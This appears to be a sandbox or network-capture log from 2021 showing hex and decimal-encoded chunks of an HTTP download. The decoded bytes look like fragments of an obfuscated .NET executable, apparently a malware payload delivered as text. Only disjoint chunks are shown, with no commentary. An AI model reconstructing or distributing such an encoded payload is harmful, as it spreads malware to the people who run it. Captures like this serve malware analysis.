                                                                                              2021-09-27 18:27:27 UTC635INData Raw: 20 32 32 20 32 34 32 20 31 39 31 20 31 39 30 20 32 31 32 20 32 34 33 20 38 39 20 37 31 20 32 35 30 20 32 20 31 36 30 20 32 33 32 20 32 30 32 20 38 39 20 31 37 30 20 31 37 38 20 38 39 20 32 35 20 34 35 20 32 34 38 20 36 30 20 36 34 20 31 36 31 20 36 37 20 32 33 31 20 31 37 32 20 31 35 20 38 32 20 31 38 31 20 31 30 37 20 36 39 20 32 39 20 31 38 34 20 31 36 38 20 32 30 31 20 39 32 20 35 34 20 31 36 20 32 30 37 20 31 33 36 20 31 35 35 20 32 38 20 37 33 20 32 31 39 20 31 30 33 20 31 37 35 20 31 30 35 20 31 33 34 20 31 33 39 20 34 36 20 32 33 34 20 31 33 36 20 39 33 20 31 32 34 20 32 34 35 20 32 20 33 36 20 32 30 39 20 37 20 31 30 32 20 31 32 33 20 32 30 32 20 31 38 33 20 32 32 37 20 32 31 30 20 37 30 20 32 34 38 20 36 39 20 39 39 20 31 30 31 20 32 35 31 20 32
                                                                                              Data Ascii: 22 242 191 190 212 243 89 71 250 2 160 232 202 89 170 178 89 25 45 248 60 64 161 67 231 172 15 82 181 107 69 29 184 168 201 92 54 16 207 136 155 28 73 219 103 175 105 134 139 46 234 136 93 124 245 2 36 209 7 102 123 202 183 227 210 70 248 69 99 101 251 2
                                                                                              2021-09-27 18:27:27 UTC651INData Raw: 39 37 20 32 32 32 20 33 38 20 31 35 30 20 32 34 35 20 31 39 37 20 34 33 20 31 38 30 20 32 34 35 20 38 39 20 32 33 36 20 39 34 20 33 33 20 32 34 38 20 32 34 36 20 32 35 20 32 30 39 20 32 31 39 20 31 31 34 20 39 33 20 35 31 20 39 31 20 31 35 36 20 35 36 20 31 39 35 20 32 31 35 20 30 20 38 31 20 36 32 20 32 33 38 20 31 32 33 20 31 36 34 20 32 32 39 20 35 36 20 31 38 33 20 36 33 20 32 32 34 20 31 37 20 38 35 20 31 35 33 20 31 35 34 20 35 35 20 39 35 20 36 33 20 34 35 20 32 38 20 34 30 20 32 34 34 20 34 32 20 35 38 20 31 38 36 20 31 30 20 38 20 32 35 35 20 31 35 39 20 36 31 20 31 38 37 20 35 33 20 31 33 30 20 39 37 20 32 34 37 20 33 20 32 33 36 20 32 30 31 20 31 36 36 20 31 36 34 20 32 35 35 20 31 30 33 20 31 31 31 20 31 34 20 39 20 39 35 20 31 32 37 20 31 20
                                                                                              Data Ascii: 97 222 38 150 245 197 43 180 245 89 236 94 33 248 246 25 209 219 114 93 51 91 156 56 195 215 0 81 62 238 123 164 229 56 183 63 224 17 85 153 154 55 95 63 45 28 40 244 42 58 186 10 8 255 159 61 187 53 130 97 247 3 236 201 166 164 255 103 111 14 9 95 127 1
                                                                                              2021-09-27 18:27:27 UTC667INData Raw: 34 39 20 31 34 34 20 31 36 36 20 32 32 30 20 32 37 20 31 36 33 20 36 31 20 31 30 34 20 31 36 37 20 31 34 31 20 31 32 32 20 31 30 20 31 37 34 20 34 35 20 31 34 37 20 32 30 35 20 31 33 38 20 34 20 31 36 20 32 34 30 20 31 32 33 20 32 34 38 20 38 36 20 36 33 20 33 35 20 38 31 20 31 32 33 20 31 37 32 20 33 38 20 31 37 39 20 32 31 30 20 31 37 20 39 31 20 32 33 38 20 32 30 34 20 31 38 35 20 32 34 39 20 32 30 30 20 31 39 33 20 38 32 20 38 32 20 36 38 20 39 39 20 31 33 38 20 32 32 33 20 32 32 31 20 31 34 33 20 31 35 38 20 31 39 37 20 31 31 39 20 39 38 20 33 33 20 32 34 36 20 31 31 34 20 30 20 34 35 20 31 30 30 20 34 30 20 32 31 30 20 33 38 20 31 33 32 20 39 32 20 36 31 20 31 35 31 20 31 37 34 20 31 35 20 31 34 35 20 32 20 31 30 35 20 31 38 38 20 31 31 38 20 31 38
                                                                                              Data Ascii: 49 144 166 220 27 163 61 104 167 141 122 10 174 45 147 205 138 4 16 240 123 248 86 63 35 81 123 172 38 179 210 17 91 238 204 185 249 200 193 82 82 68 99 138 223 221 143 158 197 119 98 33 246 114 0 45 100 40 210 38 132 92 61 151 174 15 145 2 105 188 118 18
                                                                                              2021-09-27 18:27:27 UTC683INData Raw: 34 39 20 39 32 20 38 33 20 31 33 34 20 31 32 20 32 31 38 20 32 31 37 20 32 34 37 20 37 30 20 33 30 20 31 37 38 20 38 35 20 36 31 20 32 30 35 20 32 31 39 20 33 33 20 31 30 35 20 31 34 30 20 32 32 31 20 31 36 20 31 38 38 20 32 34 32 20 31 37 30 20 34 20 33 39 20 32 32 37 20 32 30 38 20 32 31 33 20 31 35 38 20 38 35 20 31 31 36 20 32 33 33 20 32 32 30 20 35 34 20 31 38 39 20 31 31 31 20 35 32 20 33 31 20 32 32 30 20 32 30 33 20 31 34 38 20 33 37 20 31 38 33 20 32 34 34 20 31 31 31 20 31 39 38 20 35 35 20 39 30 20 32 30 35 20 31 30 37 20 33 39 20 32 30 32 20 31 37 30 20 36 36 20 32 31 35 20 31 32 38 20 31 31 36 20 33 37 20 35 30 20 32 34 37 20 31 33 30 20 31 33 33 20 31 34 32 20 32 35 32 20 36 37 20 31 31 31 20 37 39 20 31 32 37 20 31 30 37 20 32 30 35 20 31
                                                                                              Data Ascii: 49 92 83 134 12 218 217 247 70 30 178 85 61 205 219 33 105 140 221 16 188 242 170 4 39 227 208 213 158 85 116 233 220 54 189 111 52 31 220 203 148 37 183 244 111 198 55 90 205 107 39 202 170 66 215 128 116 37 50 247 130 133 142 252 67 111 79 127 107 205 1
                                                                                              2021-09-27 18:27:27 UTC699INData Raw: 31 20 30 20 31 31 33 20 31 20 30 20 30 20 35 20 30 20 30 20 31 37 20 31 34 30 20 34 35 20 30 20 30 20 31 20 30 20 30 20 30 20 31 31 34 20 30 20 31 38 30 20 33 20 31 31 32 20 34 30 20 32 31 20 30 20 30 20 31 30 20 34 30 20 31 38 20 30 20 30 20 31 30 20 32 35 34 20 31 34 20 31 20 30 20 32 35 34 20 31 33 20 31 20 30 20 32 35 34 20 32 32 20 35 31 20 30 20 30 20 31 20 31 31 31 20 31 39 20 30 20 30 20 31 30 20 34 30 20 32 32 20 30 20 30 20 31 30 20 32 35 34 20 31 34 20 30 20 30 20 34 33 20 36 20 32 35 34 20 32 32 20 37 31 20 30 20 30 20 31 20 32 35 34 20 31 32 20 30 20 30 20 34 30 20 32 33 20 30 20 30 20 31 30 20 33 38 20 31 31 34 20 31 33 20 31 38 31 20 33 20 31 31 32 20 32 35 34 20 31 32 20 30 20 30 20 34 30 20 34 34 20 30 20 30 20 31 30 20 34 30 20 32 20 30
                                                                                              Data Ascii: 1 0 113 1 0 0 5 0 0 17 140 45 0 0 1 0 0 0 114 0 180 3 112 40 21 0 0 10 40 18 0 0 10 254 14 1 0 254 13 1 0 254 22 51 0 0 1 111 19 0 0 10 40 22 0 0 10 254 14 0 0 43 6 254 22 71 0 0 1 254 12 0 0 40 23 0 0 10 38 114 13 181 3 112 254 12 0 0 40 44 0 0 10 40 2 0
                                                                                              2021-09-27 18:27:27 UTC715INData Raw: 34 20 31 32 20 39 20 30 20 31 31 31 20 36 38 20 30 20 30 20 31 30 20 32 35 34 20 31 34 20 31 30 20 30 20 33 32 20 34 20 30 20 30 20 30 20 32 35 34 20 31 34 20 32 20 30 20 32 35 34 20 31 32 20 31 30 20 30 20 31 31 34 20 33 34 20 31 20 34 20 31 31 32 20 31 31 31 20 37 34 20 30 20 30 20 31 30 20 31 31 31 20 31 39 20 30 20 30 20 31 30 20 31 31 34 20 34 34 20 31 20 34 20 31 31 32 20 31 31 31 20 34 31 20 30 20 30 20 31 30 20 35 37 20 33 34 20 30 20 30 20 30 20 32 35 34 20 31 32 20 31 30 20 30 20 31 31 34 20 33 34 20 31 20 34 20 31 31 32 20 31 31 31 20 37 34 20 30 20 30 20 31 30 20 31 31 31 20 31 39 20 30 20 30 20 31 30 20 31 31 34 20 35 38 20 31 20 34 20 31 31 32 20 31 31 31 20 34 31 20 30 20 30 20 31 30 20 35 36 20 35 20 30 20 30 20 30 20 33 32 20 30 20 30 20
                                                                                              Data Ascii: 4 12 9 0 111 68 0 0 10 254 14 10 0 32 4 0 0 0 254 14 2 0 254 12 10 0 114 34 1 4 112 111 74 0 0 10 111 19 0 0 10 114 44 1 4 112 111 41 0 0 10 57 34 0 0 0 254 12 10 0 114 34 1 4 112 111 74 0 0 10 111 19 0 0 10 114 58 1 4 112 111 41 0 0 10 56 5 0 0 0 32 0 0
                                                                                              2021-09-27 18:27:27 UTC731INData Raw: 33 20 30 20 30 20 30 20 32 35 34 20 31 34 20 33 20 30 20 34 30 20 33 35 20 30 20 30 20 36 20 34 30 20 35 33 20 30 20 30 20 31 30 20 33 32 20 30 20 30 20 30 20 30 20 32 35 34 20 31 20 32 35 34 20 31 34 20 35 20 30 20 33 32 20 34 20 30 20 30 20 30 20 32 35 34 20 31 34 20 33 20 30 20 32 35 34 20 31 32 20 35 20 30 20 32 35 34 20 31 34 20 37 20 30 20 32 35 34 20 31 32 20 37 20 30 20 35 37 20 32 34 20 30 20 30 20 30 20 33 32 20 35 20 30 20 30 20 30 20 32 35 34 20 31 34 20 33 20 30 20 33 32 20 30 20 30 20 30 20 30 20 32 35 34 20 31 34 20 36 20 30 20 30 20 35 36 20 31 34 33 20 31 20 30 20 30 20 30 20 33 32 20 37 20 30 20 30 20 30 20 32 35 34 20 31 34 20 33 20 30 20 31 31 35 20 31 30 37 20 30 20 30 20 31 30 20 32 35 34 20 31 34 20 38 20 30 20 33 32 20 38 20 30 20
                                                                                              Data Ascii: 3 0 0 0 254 14 3 0 40 35 0 0 6 40 53 0 0 10 32 0 0 0 0 254 1 254 14 5 0 32 4 0 0 0 254 14 3 0 254 12 5 0 254 14 7 0 254 12 7 0 57 24 0 0 0 32 5 0 0 0 254 14 3 0 32 0 0 0 0 254 14 6 0 0 56 143 1 0 0 0 32 7 0 0 0 254 14 3 0 115 107 0 0 10 254 14 8 0 32 8 0
                                                                                              2021-09-27 18:27:27 UTC747INData Raw: 32 20 34 30 20 30 20 30 20 30 20 33 32 20 32 20 30 20 30 20 30 20 31 31 31 20 31 38 35 20 30 20 30 20 31 30 20 31 31 31 20 31 38 35 20 30 20 30 20 31 30 20 33 32 20 33 20 30 20 30 20 30 20 33 32 20 34 31 20 30 20 30 20 30 20 34 32 20 33 32 20 34 20 30 20 30 20 30 20 33 32 20 30 20 30 20 30 20 30 20 33 32 20 35 20 30 20 30 20 30 20 33 32 20 31 20 30 20 30 20 30 20 33 32 20 34 30 20 30 20 30 20 30 20 33 32 20 32 20 30 20 30 20 30 20 31 31 31 20 31 38 36 20 30 20 30 20 31 30 20 31 31 31 20 31 38 36 20 30 20 30 20 31 30 20 33 32 20 33 20 30 20 30 20 30 20 33 32 20 34 31 20 30 20 30 20 30 20 34 32 20 33 32 20 34 20 30 20 30 20 30 20 33 32 20 34 30 20 30 20 30 20 30 20 34 30 20 31 38 37 20 30 20 30 20 31 30 20 34 30 20 31 38 37 20 30 20 30 20 31 30 20 34 30 20
                                                                                              Data Ascii: 2 40 0 0 0 32 2 0 0 0 111 185 0 0 10 111 185 0 0 10 32 3 0 0 0 32 41 0 0 0 42 32 4 0 0 0 32 0 0 0 0 32 5 0 0 0 32 1 0 0 0 32 40 0 0 0 32 2 0 0 0 111 186 0 0 10 111 186 0 0 10 32 3 0 0 0 32 41 0 0 0 42 32 4 0 0 0 32 40 0 0 0 40 187 0 0 10 40 187 0 0 10 40
                                                                                              2021-09-27 18:27:27 UTC763INData Raw: 20 30 20 30 20 30 20 33 31 20 34 39 20 31 35 37 20 33 37 20 33 32 20 31 20 30 20 30 20 30 20 33 31 20 35 37 20 31 35 37 20 33 37 20 32 33 20 33 31 20 31 31 31 20 31 35 37 20 33 37 20 33 32 20 30 20 30 20 30 20 30 20 33 31 20 35 36 20 31 35 37 20 33 37 20 33 32 20 30 20 30 20 30 20 30 20 33 31 20 31 30 32 20 31 35 37 20 33 37 20 33 32 20 30 20 30 20 30 20 30 20 33 31 20 35 30 20 31 35 37 20 33 37 20 32 32 20 33 31 20 38 37 20 31 35 37 20 31 31 35 20 32 30 34 20 30 20 30 20 31 30 20 34 32 20 30 20 30 20 31 39 20 34 38 20 34 20 30 20 32 30 34 20 30 20 30 20 30 20 33 20 30 20 30 20 31 37 20 32 38 20 31 34 31 20 39 37 20 30 20 30 20 31 20 33 37 20 33 32 20 35 20 30 20 30 20 30 20 33 31 20 31 30 31 20 31 35 37 20 33 37 20 33 32 20 35 20 30 20 30 20 30 20 33 31
                                                                                              Data Ascii: 0 0 0 31 49 157 37 32 1 0 0 0 31 57 157 37 23 31 111 157 37 32 0 0 0 0 31 56 157 37 32 0 0 0 0 31 102 157 37 32 0 0 0 0 31 50 157 37 22 31 87 157 115 204 0 0 10 42 0 0 19 48 4 0 204 0 0 0 3 0 0 17 28 141 97 0 0 1 37 32 5 0 0 0 31 101 157 37 32 5 0 0 0 31
                                                                                              2021-09-27 18:27:27 UTC779INData Raw: 31 31 37 20 32 20 38 36 20 31 32 38 20 31 36 32 20 31 36 39 20 31 31 37 20 32 20 38 36 20 31 32 38 20 32 33 33 20 31 32 34 20 31 31 37 20 32 20 38 36 20 31 32 38 20 32 20 31 31 34 20 31 31 37 20 32 20 38 36 20 31 32 38 20 32 30 37 20 31 33 38 20 31 31 37 20 32 20 38 36 20 31 32 38 20 33 33 20 33 36 20 31 31 37 20 32 20 38 36 20 31 32 38 20 33 33 20 37 35 20 31 31 37 20 32 20 38 36 20 31 32 38 20 33 37 20 31 34 31 20 31 31 37 20 32 20 38 36 20 31 32 38 20 34 34 20 34 38 20 31 31 37 20 32 20 38 36 20 31 32 38 20 32 36 20 32 38 20 31 31 37 20 32 20 38 36 20 31 32 38 20 31 30 39 20 31 34 30 20 31 31 37 20 32 20 38 36 20 31 32 38 20 35 34 20 31 36 31 20 31 31 37 20 32 20 38 36 20 31 32 38 20 32 32 38 20 31 34 39 20 31 31 37 20 32 20 38 36 20 31 32 38 20 31 38
                                                                                              Data Ascii: 117 2 86 128 162 169 117 2 86 128 233 124 117 2 86 128 2 114 117 2 86 128 207 138 117 2 86 128 33 36 117 2 86 128 33 75 117 2 86 128 37 141 117 2 86 128 44 48 117 2 86 128 26 28 117 2 86 128 109 140 117 2 86 128 54 161 117 2 86 128 228 149 117 2 86 128 18
                                                                                              2021-09-27 18:27:27 UTC795INData Raw: 20 32 20 34 35 20 30 20 36 38 20 31 38 38 20 33 20 30 20 30 20 30 20 31 37 20 32 34 20 31 37 38 20 31 38 20 31 20 30 20 34 35 20 30 20 34 30 20 38 30 20 33 20 30 20 30 20 30 20 31 37 20 32 34 20 31 37 38 20 31 38 20 31 20 30 20 34 35 20 30 20 30 20 30 20 30 20 30 20 33 20 30 20 36 20 32 34 20 31 37 32 20 31 38 20 32 34 37 20 38 20 34 35 20 30 20 30 20 30 20 30 20 30 20 33 20 30 20 37 30 20 33 20 32 33 37 20 35 20 32 35 33 20 38 20 34 37 20 30 20 30 20 30 20 30 20 30 20 33 20 30 20 37 30 20 33 20 32 32 37 20 35 20 36 20 39 20 35 30 20 30 20 30 20 30 20 30 20 30 20 33 20 30 20 37 30 20 33 20 32 34 32 20 35 20 31 32 20 39 20 35 31 20 30 20 30 20 30 20 30 20 30 20 33 20 30 20 36 20 32 34 20 31 37 32 20 31 38 20 32 34 37 20 38 20 35 32 20 30 20 30 20 30 20 30
                                                                                              Data Ascii: 2 45 0 68 188 3 0 0 0 17 24 178 18 1 0 45 0 40 80 3 0 0 0 17 24 178 18 1 0 45 0 0 0 0 0 3 0 6 24 172 18 247 8 45 0 0 0 0 0 3 0 70 3 237 5 253 8 47 0 0 0 0 0 3 0 70 3 227 5 6 9 50 0 0 0 0 0 3 0 70 3 242 5 12 9 51 0 0 0 0 0 3 0 6 24 172 18 247 8 52 0 0 0 0
                                                                                              2021-09-27 18:27:27 UTC811INData Raw: 30 20 31 39 32 20 38 20 32 32 31 20 31 31 20 38 20 30 20 31 39 36 20 38 20 32 32 36 20 31 31 20 38 20 30 20 32 30 30 20 38 20 32 33 31 20 31 31 20 38 20 30 20 32 30 34 20 38 20 32 33 36 20 31 31 20 38 20 30 20 32 30 38 20 38 20 32 34 31 20 31 31 20 38 20 30 20 32 31 32 20 38 20 32 34 36 20 31 31 20 38 20 30 20 32 31 36 20 38 20 32 35 31 20 31 31 20 38 20 30 20 32 32 30 20 38 20 30 20 31 32 20 38 20 30 20 32 32 34 20 38 20 35 20 31 32 20 38 20 30 20 32 32 38 20 38 20 31 30 20 31 32 20 38 20 30 20 32 33 32 20 38 20 31 35 20 31 32 20 38 20 30 20 32 33 36 20 38 20 32 30 20 31 32 20 38 20 30 20 32 34 30 20 38 20 32 35 20 31 32 20 38 20 30 20 32 34 34 20 38 20 33 30 20 31 32 20 38 20 30 20 32 34 38 20 38 20 33 35 20 31 32 20 38 20 30 20 32 35 32 20 38 20 34 30
                                                                                              Data Ascii: 0 192 8 221 11 8 0 196 8 226 11 8 0 200 8 231 11 8 0 204 8 236 11 8 0 208 8 241 11 8 0 212 8 246 11 8 0 216 8 251 11 8 0 220 8 0 12 8 0 224 8 5 12 8 0 228 8 10 12 8 0 232 8 15 12 8 0 236 8 20 12 8 0 240 8 25 12 8 0 244 8 30 12 8 0 248 8 35 12 8 0 252 8 40
                                                                                              2021-09-27 18:27:27 UTC827INData Raw: 36 20 31 30 34 20 30 20 39 35 20 39 35 20 39 35 20 36 38 20 39 37 20 37 31 20 35 37 20 31 31 31 20 35 37 20 37 30 20 35 31 20 31 30 31 20 39 37 20 35 33 20 35 34 20 31 31 34 20 35 31 20 31 30 36 20 30 20 38 39 20 31 30 30 20 35 32 20 35 36 20 35 33 20 35 32 20 35 33 20 31 30 31 20 38 39 20 35 30 20 31 30 32 20 35 36 20 35 32 20 36 39 20 31 30 36 20 30 20 39 35 20 39 35 20 39 35 20 37 30 20 39 37 20 35 31 20 35 31 20 35 35 20 36 35 20 35 37 20 39 37 20 35 34 20 36 36 20 34 39 20 35 37 20 37 36 20 36 36 20 31 30 37 20 30 20 36 35 20 31 31 35 20 31 32 31 20 31 31 30 20 39 39 20 36 37 20 39 37 20 31 30 38 20 31 30 38 20 39 38 20 39 37 20 39 39 20 31 30 37 20 30 20 36 38 20 31 30 31 20 31 30 38 20 31 30 31 20 31 30 33 20 39 37 20 31 31 36 20 31 30 31 20 36 37
                                                                                              Data Ascii: 6 104 0 95 95 95 68 97 71 57 111 57 70 51 101 97 53 54 114 51 106 0 89 100 52 56 53 52 53 101 89 50 102 56 52 69 106 0 95 95 95 70 97 51 51 55 65 57 97 54 66 49 57 76 66 107 0 65 115 121 110 99 67 97 108 108 98 97 99 107 0 68 101 108 101 103 97 116 101 67
                                                                                              2021-09-27 18:27:27 UTC843INData Raw: 32 33 31 20 31 32 38 20 31 36 33 20 32 33 31 20 31 32 38 20 31 39 31 20 32 33 31 20 31 32 38 20 31 37 38 20 32 33 31 20 31 32 38 20 31 33 31 20 32 33 31 20 31 32 38 20 31 32 38 20 32 33 31 20 31 32 39 20 31 33 30 20 30 20 32 32 38 20 31 33 32 20 31 34 30 20 32 32 38 20 31 33 32 20 31 39 30 20 32 32 38 20 31 33 33 20 31 33 37 20 32 32 38 20 31 33 32 20 31 34 36 20 32 32 38 20 31 33 33 20 31 33 30 20 32 32 38 20 31 33 32 20 31 35 38 20 32 32 38 20 31 33 32 20 31 39 31 20 32 32 38 20 31 33 32 20 31 38 39 20 32 32 38 20 31 33 33 20 31 32 39 20 32 32 38 20 31 33 32 20 31 34 30 20 32 32 38 20 31 33 32 20 31 34 37 20 32 32 38 20 31 33 32 20 31 34 37 20 32 32 38 20 31 33 32 20 31 34 39 20 32 32 38 20 31 33 32 20 31 36 35 20 32 32 38 20 31 33 33 20 31 33 30 20 30
                                                                                              Data Ascii: 231 128 163 231 128 191 231 128 178 231 128 131 231 128 128 231 129 130 0 228 132 140 228 132 190 228 133 137 228 132 146 228 133 130 228 132 158 228 132 191 228 132 189 228 133 129 228 132 140 228 132 147 228 132 147 228 132 149 228 132 165 228 133 130 0
                                                                                              2021-09-27 18:27:27 UTC859INData Raw: 38 20 31 36 36 20 31 33 37 20 30 20 32 33 39 20 31 37 36 20 31 35 36 20 32 33 39 20 31 37 36 20 31 35 35 20 32 33 39 20 31 37 36 20 31 35 32 20 32 33 39 20 31 37 36 20 31 36 37 20 32 33 39 20 31 37 36 20 31 36 36 20 32 33 39 20 31 37 37 20 31 33 37 20 32 33 39 20 31 37 36 20 31 35 31 20 32 33 39 20 31 37 36 20 31 38 34 20 32 33 39 20 31 37 36 20 31 34 39 20 32 33 39 20 31 37 37 20 31 33 34 20 32 33 39 20 31 37 37 20 31 34 30 20 32 33 39 20 31 37 37 20 31 35 33 20 32 33 39 20 31 37 36 20 31 34 38 20 32 33 39 20 31 37 36 20 31 35 34 20 32 33 39 20 31 37 37 20 31 33 37 20 30 20 32 33 32 20 31 37 38 20 31 38 38 20 32 33 32 20 31 37 38 20 31 33 32 20 32 33 32 20 31 37 38 20 31 33 34 20 32 33 32 20 31 37 38 20 31 38 33 20 32 33 32 20 31 37 38 20 31 33 32 20 32
                                                                                              Data Ascii: 8 166 137 0 239 176 156 239 176 155 239 176 152 239 176 167 239 176 166 239 177 137 239 176 151 239 176 184 239 176 149 239 177 134 239 177 140 239 177 153 239 176 148 239 176 154 239 177 137 0 232 178 188 232 178 132 232 178 134 232 178 183 232 178 132 2
                                                                                              2021-09-27 18:27:27 UTC863INData Raw: 31 36 37 20 32 33 30 20 31 34 34 20 31 38 34 20 32 33 30 20 31 34 34 20 31 34 33 20 32 33 30 20 31 34 34 20 31 39 31 20 32 33 30 20 31 34 35 20 31 33 38 20 32 33 30 20 31 34 34 20 31 38 37 20 32 33 30 20 31 34 34 20 31 38 37 20 32 33 30 20 31 34 35 20 31 33 38 20 32 33 30 20 31 34 34 20 31 33 39 20 30 20 32 33 38 20 31 34 36 20 31 38 35 20 32 33 38 20 31 34 36 20 31 34 34 20 32 33 38 20 31 34 36 20 31 34 35 20 32 33 38 20 31 34 36 20 31 39 30 20 32 33 38 20 31 34 36 20 31 35 38 20 32 33 38 20 31 34 36 20 31 39 30 20 32 33 38 20 31 34 36 20 31 38 38 20 32 33 38 20 31 34 36 20 31 38 37 20 32 33 38 20 31 34 36 20 31 38 39 20 32 33 38 20 31 34 36 20 31 38 37 20 32 33 38 20 31 34 36 20 31 34 32 20 32 33 38 20 31 34 36 20 31 34 35 20 32 33 38 20 31 34 36 20 31
                                                                                              Data Ascii: 167 230 144 184 230 144 143 230 144 191 230 145 138 230 144 187 230 144 187 230 145 138 230 144 139 0 238 146 185 238 146 144 238 146 145 238 146 190 238 146 158 238 146 190 238 146 188 238 146 187 238 146 189 238 146 187 238 146 142 238 146 145 238 146 1
                                                                                              2021-09-27 18:27:27 UTC879INData Raw: 33 20 32 33 38 20 31 33 38 20 31 34 37 20 32 33 38 20 31 33 38 20 31 34 38 20 32 33 38 20 31 33 37 20 31 36 37 20 32 33 38 20 31 33 38 20 31 35 33 20 32 33 38 20 31 33 37 20 31 35 38 20 32 33 38 20 31 33 37 20 31 36 36 20 32 33 38 20 31 33 37 20 31 37 35 20 32 33 38 20 31 33 38 20 31 34 37 20 32 33 38 20 31 33 37 20 31 36 35 20 32 33 38 20 31 33 38 20 31 34 34 20 32 33 38 20 31 33 38 20 31 34 33 20 32 33 38 20 31 33 38 20 31 34 35 20 32 33 38 20 31 33 38 20 31 34 35 20 30 20 32 33 39 20 31 34 35 20 31 35 36 20 32 33 39 20 31 34 36 20 31 35 33 20 32 33 39 20 31 34 35 20 31 35 37 20 32 33 39 20 31 34 35 20 31 35 34 20 32 33 39 20 31 34 36 20 31 35 33 20 32 33 39 20 31 34 36 20 31 35 37 20 32 33 39 20 31 34 36 20 31 34 34 20 32 33 39 20 31 34 35 20 31 36 30
                                                                                              Data Ascii: 3 238 138 147 238 138 148 238 137 167 238 138 153 238 137 158 238 137 166 238 137 175 238 138 147 238 137 165 238 138 144 238 138 143 238 138 145 238 138 145 0 239 145 156 239 146 153 239 145 157 239 145 154 239 146 153 239 146 157 239 146 144 239 145 160
                                                                                              2021-09-27 18:27:27 UTC895INData Raw: 32 32 35 20 31 36 32 20 31 33 30 20 32 32 35 20 31 36 32 20 31 33 30 20 32 32 35 20 31 36 32 20 31 33 30 20 32 32 35 20 31 36 32 20 31 33 35 20 32 32 35 20 31 36 32 20 31 33 34 20 32 32 35 20 31 36 32 20 31 34 39 20 32 32 35 20 31 36 32 20 31 33 31 20 32 32 35 20 31 36 32 20 31 32 39 20 32 32 35 20 31 36 32 20 31 36 30 20 32 32 35 20 31 36 32 20 31 33 30 20 32 32 35 20 31 36 32 20 31 32 39 20 32 32 35 20 31 36 32 20 31 36 38 20 32 32 35 20 31 36 32 20 31 35 32 20 30 20 32 33 32 20 31 36 32 20 31 35 30 20 32 33 32 20 31 36 33 20 31 33 31 20 32 33 32 20 31 36 32 20 31 36 31 20 32 33 32 20 31 36 32 20 31 36 32 20 32 33 32 20 31 36 32 20 31 34 35 20 32 33 32 20 31 36 32 20 31 34 35 20 32 33 32 20 31 36 33 20 31 34 37 20 32 33 32 20 31 36 32 20 31 35 31 20 32
                                                                                              Data Ascii: 225 162 130 225 162 130 225 162 130 225 162 135 225 162 134 225 162 149 225 162 131 225 162 129 225 162 160 225 162 130 225 162 129 225 162 168 225 162 152 0 232 162 150 232 163 131 232 162 161 232 162 162 232 162 145 232 162 145 232 163 147 232 162 151 2
                                                                                              2021-09-27 18:27:27 UTC911INData Raw: 31 38 37 20 31 32 38 20 32 32 39 20 31 38 37 20 31 34 35 20 32 32 39 20 31 38 36 20 31 35 39 20 30 20 32 32 38 20 31 38 38 20 31 36 32 20 32 32 38 20 31 38 39 20 31 34 38 20 32 32 38 20 31 38 38 20 31 36 34 20 32 32 38 20 31 38 38 20 31 35 39 20 32 32 38 20 31 38 39 20 31 34 33 20 32 32 38 20 31 38 38 20 31 36 37 20 32 32 38 20 31 38 39 20 31 36 38 20 32 32 38 20 31 38 38 20 31 36 36 20 32 32 38 20 31 38 38 20 31 36 33 20 32 32 38 20 31 38 39 20 31 33 35 20 32 32 38 20 31 38 39 20 31 36 35 20 32 32 38 20 31 38 38 20 31 38 39 20 32 32 38 20 31 38 38 20 31 36 31 20 32 32 38 20 31 38 38 20 31 36 30 20 32 32 38 20 31 38 38 20 31 35 39 20 30 20 32 32 30 20 31 35 38 20 32 32 30 20 31 35 32 20 32 32 31 20 31 33 39 20 32 32 30 20 31 37 32 20 32 32 30 20 31 35 34
                                                                                              Data Ascii: 187 128 229 187 145 229 186 159 0 228 188 162 228 189 148 228 188 164 228 188 159 228 189 143 228 188 167 228 189 168 228 188 166 228 188 163 228 189 135 228 189 165 228 188 189 228 188 161 228 188 160 228 188 159 0 220 158 220 152 221 139 220 172 220 154
                                                                                              2021-09-27 18:27:27 UTC927INData Raw: 36 20 31 38 30 20 32 33 32 20 31 35 36 20 31 33 36 20 32 33 32 20 31 35 36 20 31 33 35 20 32 33 32 20 31 35 37 20 31 33 34 20 32 33 32 20 31 35 36 20 31 33 32 20 32 33 32 20 31 35 35 20 31 39 31 20 32 33 32 20 31 35 36 20 31 32 39 20 32 33 32 20 31 35 36 20 31 33 30 20 32 33 32 20 31 35 36 20 31 34 36 20 32 33 32 20 31 35 36 20 31 33 34 20 32 33 32 20 31 35 36 20 31 38 31 20 32 33 32 20 31 35 36 20 31 38 31 20 32 33 32 20 31 35 36 20 31 36 36 20 30 20 32 33 38 20 31 35 36 20 31 38 39 20 32 33 38 20 31 35 36 20 31 33 38 20 32 33 38 20 31 35 36 20 31 36 35 20 32 33 38 20 31 35 36 20 31 36 37 20 32 33 38 20 31 35 35 20 31 38 37 20 32 33 38 20 31 35 35 20 31 38 35 20 32 33 38 20 31 35 36 20 31 34 33 20 32 33 38 20 31 35 36 20 31 36 34 20 32 33 38 20 31 35 35
                                                                                              Data Ascii: 6 180 232 156 136 232 156 135 232 157 134 232 156 132 232 155 191 232 156 129 232 156 130 232 156 146 232 156 134 232 156 181 232 156 181 232 156 166 0 238 156 189 238 156 138 238 156 165 238 156 167 238 155 187 238 155 185 238 156 143 238 156 164 238 155
                                                                                              2021-09-27 18:27:27 UTC943INData Raw: 32 20 32 32 34 20 31 39 30 20 31 38 30 20 32 32 34 20 31 39 30 20 31 37 34 20 30 20 32 33 30 20 31 39 30 20 31 38 39 20 32 33 30 20 31 39 31 20 31 37 33 20 32 33 31 20 31 32 38 20 31 32 39 20 32 33 30 20 31 39 30 20 31 39 31 20 32 33 30 20 31 39 31 20 31 33 33 20 32 33 30 20 31 39 31 20 31 38 35 20 32 33 30 20 31 39 31 20 31 37 38 20 32 33 30 20 31 39 30 20 31 39 31 20 32 33 30 20 31 39 31 20 31 37 38 20 32 33 30 20 31 39 31 20 31 34 35 20 32 33 30 20 31 39 31 20 31 33 32 20 32 33 30 20 31 39 31 20 31 36 34 20 32 33 30 20 31 39 31 20 31 33 32 20 32 33 30 20 31 39 30 20 31 39 31 20 32 33 30 20 31 39 31 20 31 37 34 20 30 20 32 31 39 20 31 38 39 20 32 32 30 20 31 33 32 20 32 32 30 20 31 36 37 20 32 31 39 20 31 38 39 20 32 32 30 20 31 33 33 20 32 32 30 20 31
                                                                                              Data Ascii: 2 224 190 180 224 190 174 0 230 190 189 230 191 173 231 128 129 230 190 191 230 191 133 230 191 185 230 191 178 230 190 191 230 191 178 230 191 145 230 191 132 230 191 164 230 191 132 230 190 191 230 191 174 0 219 189 220 132 220 167 219 189 220 133 220 1
